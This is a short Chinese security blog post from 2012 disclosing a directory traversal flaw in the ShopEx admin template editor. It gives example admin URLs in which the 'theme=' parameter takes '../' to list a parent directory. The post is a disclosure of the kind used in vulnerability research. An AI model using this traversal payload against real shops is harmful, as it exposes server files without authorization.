您的位置 » 首页 » 实用工具 » ShopEx后台历遍目录漏洞

ShopEx后台历遍目录漏洞

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年09月07日 | 文章热度:2,780 次 全屏阅读

显示不全请点击全屏阅读

ShopEx后台历遍目录 很蛋疼的
记得10年的是也有过的差不多的漏洞

主要是出在模板上
我们编辑目录之后得到URL

http://www.xxoo.com/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=
这里theme= 可以做../跳转
http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../
跳到了上级目录

Tags:

ShopEx漏洞, 遍历目录漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/825/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)